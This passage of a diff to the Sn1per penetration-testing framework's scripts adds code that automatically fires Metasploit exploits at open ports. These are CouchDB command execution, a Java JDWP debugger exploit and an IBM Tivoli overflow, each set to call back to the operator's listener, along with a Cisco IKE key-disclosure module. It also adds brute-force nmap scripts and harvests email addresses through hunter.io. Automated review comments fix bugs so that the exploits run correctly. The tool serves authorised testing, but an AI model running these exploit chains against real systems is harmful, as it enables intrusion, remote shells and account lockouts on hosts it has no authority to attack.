-z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/masswebscan.sh b/modes/masswebscan.sh new file mode 100644 index 00000000..ad8f7328 --- /dev/null +++ b/modes/masswebscan.sh 
@@ -0,0 +1,71 @@ +# MASSWEB MODE ##################################################################################################### +if [ "$MODE" = "massweb" ]; then + if [ -z "$FILE" ]; then + logo + echo "You need to specify a list of targets (ie. -f ) to scan." + exit + fi + if [ "$REPORT" = "1" ]; then + for a in `cat $FILE`; + do + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $WORKSPACE_DIR 2> /dev/null + mkdir $WORKSPACE_DIR/domains 2> /dev/null + mkdir $WORKSPACE_DIR/screenshots 2> /dev/null + mkdir $WORKSPACE_DIR/nmap 2> /dev/null + mkdir $WORKSPACE_DIR/notes 2> /dev/null + mkdir $WORKSPACE_DIR/reports 2> /dev/null + mkdir $WORKSPACE_DIR/output 2> /dev/null + fi + args="$args -m webscan --noreport --noloot" + TARGET="$a" + args="$args -t $TARGET" + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$RESET" + if [ ! 
-z "$WORKSPACE_DIR" ]; then + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + else + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + fi + args="" + done + fi + if [ "$LOOT" = "1" ]; then + loot + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + exit +fi diff --git a/modes/normal.sh b/modes/normal.sh index dfdc68ad..65028ae7 100644 --- a/modes/normal.sh +++ b/modes/normal.sh 
@@ -143,27 +143,27 @@ port_5984=`grep 'portid="5984"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_6667=`grep 'portid="6667"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_7001=`grep 'portid="7001"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8000=`grep 'portid="8000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8009=`grep 'portid="8009"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8080=`grep 'portid="8080"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8180=`grep 'portid="8180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8443=`grep 'portid="8443"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_8888=`grep 'portid="8888"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -port_8888=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_9200=`grep 'portid="9200"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_9495=`grep 'portid="9495"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_10000=`grep 'portid="10000"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_16992=`grep 'portid="16992"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27017=`grep 'portid="27017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27018=`grep 'portid="27018"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_27019=`grep 'portid="27019"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_28017=`grep 'portid="28017"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` +port_49180=`grep 'portid="49180"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` port_49152=`grep 'portid="49152"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open` -if [ "$FULLNMAPSCAN" = "1" ]; then - port_67=`grep 'portid="67"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_68=`grep 'portid="68"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_69=`grep 'portid="69"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_123=`grep 'portid="123"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` - port_161=`grep 'portid="161"' 
$LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open` -fi +port_67=`grep 'portid="67"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_68=`grep 'portid="68"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_69=`grep 'portid="69"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_123=`grep 'portid="123"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_161=`grep 'portid="161"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` +port_500=`grep 'portid="500"' $LOOT_DIR/nmap/nmap-udp-$TARGET.xml | grep open | grep -v filtered` if [ -z "$port_21" ]; then 
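Review bot: Moving the six UDP `port_*` lookups out of the `FULLNMAPSCAN` guard makes them run on every scan, and when no UDP scan was performed `$LOOT_DIR/nmap/nmap-udp-$TARGET.xml` does not exist, so each grep now emits a "No such file or directory" error where the old code never reached them. Guard the group once, `if [ -f "$LOOT_DIR/nmap/nmap-udp-$TARGET.xml" ]; then … fi`, or add `2> /dev/null` to each as the rest of the file does. Worth confirming before merge: `port_8009` is deleted here while its consumer later in normal.sh is outside the hunk — if `$port_8009` is still read there it is now always empty. The `grep open | grep -v filtered` filter is the right way to exclude the XML `state="open|filtered"` entries.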
@@ -370,7 +370,7 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -Pn -T5 -p 80 -sV --script=*http-vuln*,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80 + nmap -A -Pn -T5 -p 80 -sV --script=http-adobe-coldfusion-apsa1301,http-apache-negotiation,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-bigip-cookie,http-brute,http-cakephp-version,http-chrono,http-cisco-anyconnect,http-coldfusion-subzero,http-comments-displayer,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-enum,http-errors,http-feed,http-form-brute,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-headers,http-hp-ilo-info,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-jsonp-detection,http-litespeed-sourcecode-download,http-ls,http-majordomo2-dir-traversal,http-malware-host,http-mcmp,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-referer-checker,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-sap-netweaver-leak,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-svn-enum,http-svn-info,ht
tp-title,http-tplink-dir-traversal,http-trace,http-trane-info,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,https-redirect,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port80 sed -r "s/ /dev/null > $LOOT_DIR/output/nmap-$TARGET-port80.txt 2> /dev/null rm -f $LOOT_DIR/output/nmap-$TARGET-port80 2> /dev/null fi 
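Review bot: Replacing `*http-vuln*` with this explicit list changes what a plain `normal` scan does against port 80 well beyond vulnerability checks: `http-brute`, `http-form-brute`, `http-joomla-brute`, `http-wordpress-brute`, `http-proxy-brute`, `http-iis-short-name-brute` and `http-default-accounts` are credential-guessing scripts that can lock accounts and run for a long time at `-T5`, and `http-robtex-reverse-ip`, `http-robtex-shared-ns`, `http-virustotal` and `http-malware-host` send the target to third-party services, which some engagements forbid (http-virustotal also needs an API key passed as a script argument). As far as this hunk shows nothing gates them, so they should be opt-in behind a config setting rather than part of the default profile. The list is duplicated verbatim in the port 443 hunk (`@@ -638,7 +638,7`); keep it in one variable, e.g. `NMAP_HTTP_SCRIPTS` in the config, and reference `--script=$NMAP_HTTP_SCRIPTS` at both call sites so they cannot drift. The enclosing `else` block starts and ends outside the hunk.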
@@ -638,7 +638,7 @@ else echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING NMAP HTTP SCRIPTS $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - nmap -A -sV -T5 -Pn -p 443 --script=*http-vuln*,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443 + nmap -A -sV -T5 -Pn -p 443 --script=http-adobe-coldfusion-apsa1301,http-apache-negotiation,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth,http-avaya-ipoffice-users,http-awstatstotals-exec,http-axis2-dir-traversal,http-backup-finder,http-barracuda-dir-traversal,http-bigip-cookie,http-brute,http-cakephp-version,http-chrono,http-cisco-anyconnect,http-coldfusion-subzero,http-comments-displayer,http-config-backup,http-cookie-flags,http-cors,http-cross-domain-policy,http-date,http-default-accounts,http-devframework,http-dlink-backdoor,http-dombased-xss,http-domino-enum-passwords,http-drupal-enum-users,http-drupal-enum,http-enum,http-errors,http-feed,http-form-brute,http-frontpage-login,http-generator,http-git,http-gitweb-projects-enum,http-headers,http-hp-ilo-info,http-huawei-hg5xx-vuln,http-icloud-findmyiphone,http-icloud-sendmsg,http-iis-short-name-brute,http-iis-webdav-vuln,http-internal-ip-disclosure,http-joomla-brute,http-jsonp-detection,http-litespeed-sourcecode-download,http-ls,http-majordomo2-dir-traversal,http-malware-host,http-mcmp,http-method-tamper,http-methods,http-mobileversion-checker,http-ntlm-info,http-open-proxy,http-open-redirect,http-passwd,http-php-version,http-phpmyadmin-dir-traversal,http-phpself-xss,http-proxy-brute,http-put,http-qnap-nas-info,http-referer-checker,http-robots.txt,http-robtex-reverse-ip,http-robtex-shared-ns,http-sap-netweaver-leak,http-security-headers,http-server-header,http-shellshock,http-sitemap-generator,http-svn-enum,http-svn-info
,http-title,http-tplink-dir-traversal,http-trace,http-trane-info,http-unsafe-output-escaping,http-userdir-enum,http-vhosts,http-virustotal,http-vlcstreamer-ls,http-vmware-path-vuln,http-vuln-cve2006-3392,http-vuln-cve2009-3960,http-vuln-cve2010-0738,http-vuln-cve2010-2861,http-vuln-cve2011-3192,http-vuln-cve2011-3368,http-vuln-cve2012-1823,http-vuln-cve2013-0156,http-vuln-cve2013-6786,http-vuln-cve2013-7091,http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129,http-vuln-cve2014-3704,http-vuln-cve2014-8877,http-vuln-cve2015-1427,http-vuln-cve2015-1635,http-vuln-cve2017-1001000,http-vuln-cve2017-5638,http-vuln-cve2017-5689,http-vuln-cve2017-8917,http-vuln-misfortune-cookie,http-vuln-wnr1000-creds,http-waf-detect,http-waf-fingerprint,http-webdav-scan,http-wordpress-brute,http-wordpress-enum,http-wordpress-users,https-redirect,/usr/share/nmap/scripts/vulscan/vulscan.nse,/usr/share/nmap/scripts/vulners $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port443 sed -r "s/ /dev/null > $LOOT_DIR/output/nmap-$TARGET-port443.txt 2> /dev/null rm -f $LOOT_DIR/output/nmap-$TARGET-port443 2> /dev/null fi @@ -710,7 +710,6 @@ else fi echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg" - if [ $WEBSCREENSHOT = "1" ]; then cd $LOOT_DIR python $INSTALL_DIR/bin/webscreenshot.py -t 5 https://$TARGET:443 
@@ -757,6 +756,21 @@ else fi fi +if [ -z "$port_500" ]; +then + echo -e "$OKRED + -- --=[Port 500 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 500 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING CISCO IKE KEY DISCLOSURE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/ike/cisco_ike_benigncertain; set RHOSTS "$TARGET"; set PACKETFILE /usr/share/metasploit-framework/data/exploits/cve-2016-6415/sendpacket.raw; set THREADS 24; set RPORT 500; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.raw > $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port500-cisco_ike_benigncertain.raw 2> /dev/null + fi +fi + if [ -z "$port_512" ]; then echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET" 
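Review bot: On the `+ msfconsole` line `set RHOSTS "$TARGET"` is written inside an already double-quoted `-x` string, so the inner quotes close and reopen the outer string and `$TARGET` reaches msfconsole unquoted; the Java RMI hunk further down escapes them as `\"$TARGET\"`, which is the form to use here and in the CouchDB, port-8000/9495, JBoss and MS15-034 hunks too. `set PACKETFILE /usr/share/metasploit-framework/data/exploits/cve-2016-6415/sendpacket.raw` hard-codes one install location; a config variable next to `MSF_LHOST` in sniper.conf would keep it adjustable. `set THREADS 24` against a single `RHOSTS` value has no effect. The enclosing `else` branch starts outside the hunk.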
@@ -1051,6 +1065,12 @@ else msfconsole -q -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw > $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING APACHE COUCHDB RCE EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/linux/http/apache_couchdb_cmd_exec; set RHOSTS "$TARGET"; set RPORT 5984; setg LHOST $MSF_LHOST; setg $MSF_LPORT; run; exit;"| tee $LOOT_DIR/output/msf-$TARGET-port5984-couchdb_enum.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.raw > $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.raw 2> /dev/null fi fi 
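Review bot: `setg $MSF_LPORT;` on the `+ msfconsole` line is missing the option name, so with the shipped config it expands to `setg 4444` and the listener port is never set; it should read `setg LPORT $MSF_LPORT;`. The same line tees to `msf-$TARGET-port5984-couchdb_enum.raw`, while the `+ sed` and `+ rm -f` lines read and delete `msf-$TARGET-port5984-apache_couchdb_cmd_exec.raw`, so the .txt report is always empty and an unstripped couchdb_enum.raw is left behind in `$LOOT_DIR/output`; change the tee target to `| tee $LOOT_DIR/output/msf-$TARGET-port5984-apache_couchdb_cmd_exec.raw`. `set RHOSTS "$TARGET"` has the nested-quote problem raised on the port-500 hunk. The two `fi` context lines close blocks that open outside the hunk.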
@@ -1120,6 +1140,46 @@ else fi fi + + + + + + + + + + +if [ -z "$port_8000" ]; +then + echo -e "$OKRED + -- --=[Port 8000 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 8000 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JAVA JDWP DEBUG EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/multi/misc/java_jdwp_debugger; setg RHOSTS "$TARGET"; set RPORT 8000; set SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.raw > $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port_8000-java_jdwp_debugger.raw 2> /dev/null + fi +fi + +if [ -z "$port_9495" ]; +then + echo -e "$OKRED + -- --=[Port 9495 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 9495 opened... 
running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING IBM TIVOLI ENDPOINT OVERFLOW EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use exploit/windows/http/ibm_tivoli_endpoint_bof; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.raw > $LOOT_DIR/output/msf-$TARGET-port7001-ibm_tivoli_endpoint_bof.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.raw 2> /dev/null + fi +fi + if [ -z "$port_10000" ]; then echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET" 
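Review bot: In the port-9495 block the `+ sed` line writes its cleaned output to `msf-$TARGET-port7001-ibm_tivoli_endpoint_bof.txt` although the raw file it reads and the `+ rm -f` line both use `port_9495`, so the report is filed under the wrong port; it should be `> $LOOT_DIR/output/msf-$TARGET-port_9495-ibm_tivoli_endpoint_bof.txt`. The new blocks also name their files `port_8000`/`port_9495` while every other block in this file uses `port500`, `port5984`, `port49180` without an underscore, which will confuse any report code that globs on `port<number>`. The ten empty `+` lines at the top of the hunk are whitespace noise. Both new `msfconsole` lines carry the nested `"$TARGET"` quoting raised on the port-500 hunk.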
@@ -1202,6 +1262,21 @@ else fi fi +if [ -z "$port_49180" ]; +then + echo -e "$OKRED + -- --=[Port 49180 closed... skipping.$RESET" +else + echo -e "$OKORANGE + -- --=[Port 49180 opened... running tests...$RESET" + if [ "$METASPLOIT_EXPLOIT" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT 49180; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port49180-java_rmi_server.raw 2> /dev/null + fi +fi + if [ $YASUO = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED SCANNING FOR COMMON VULNERABILITIES $RESET" diff --git a/modes/osint.sh b/modes/osint.sh index 139fff1e..cf4043fa 100644 --- a/modes/osint.sh +++ b/modes/osint.sh 
@@ -34,13 +34,20 @@ if [ "$OSINT" = "1" ]; then if [ "$VERBOSE" == "1" ]; then echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET" fi + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED COLLECTING OSINT FROM ONLINE DOCUMENTS $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 100 -n 100 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null if [ "$SLACK_NOTIFICATIONS_METAGOOFIL" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/metagoofil-$TARGET.txt" fi - - + fi + if [ "$HUNTERIO" == "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING EMAILS VIA HUNTER.IO $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + curl -s "https://api.hunter.io/v2/domain-search?domain=$TARGET&api_key=$HUNTERIO_KEY" | egrep "name|value|domain|company|uri|position|phone" 2> /dev/null | tee $LOOT_DIR/osint/hunterio-$TARGET.txt 2> /dev/null fi if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" diff --git a/modes/recon.sh b/modes/recon.sh index 6b177677..ad941037 100644 --- a/modes/recon.sh +++ b/modes/recon.sh 
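Review bot: The `+ curl` line passes `api_key=$HUNTERIO_KEY` as a URL query parameter on the command line, so the key is visible in `ps` output and in any verbose echo of the command, and the request is made even when the key is empty, leaving only an API error in `hunterio-$TARGET.txt`; gate the block with `if [ "$HUNTERIO" == "1" ] && [ -n "$HUNTERIO_KEY" ]; then` and, to keep the secret out of argv, put the URL in a curl config file read with `curl -K`. `$TARGET` is interpolated into the URL without encoding. `egrep` is deprecated in favour of `grep -E`. The enclosing `if [ "$OSINT" = "1" ]` starts outside the hunk.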
@@ -87,8 +87,8 @@ if [ "$RECON" = "1" ]; then grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null > $LOOT_DIR/nmap/takeovers_old-all.txt dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done; - grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME > $LOOT_DIR/nmap/takeovers_new-all.txt - diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null + grep -h "CNAME" $LOOT_DIR/nmap/takeovers-* 2>/dev/null | sort -u 2> /dev/null | awk '{print $1 " " $4 " " $5}' | grep CNAME | sort -u > $LOOT_DIR/nmap/takeovers_new-all.txt + diff $LOOT_DIR/nmap/takeovers_old-all.txt $LOOT_DIR/nmap/takeovers_new-all.txt 2> /dev/null | grep "> " | awk '{print $2 " " $3 " " $4}' | sort -u > $LOOT_DIR/nmap/takeovers_new-diff.txt 2> /dev/null if [ "$SLACK_NOTIFICATIONS_TAKEOVERS_NEW" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/takeovers_new-diff.txt" fi 
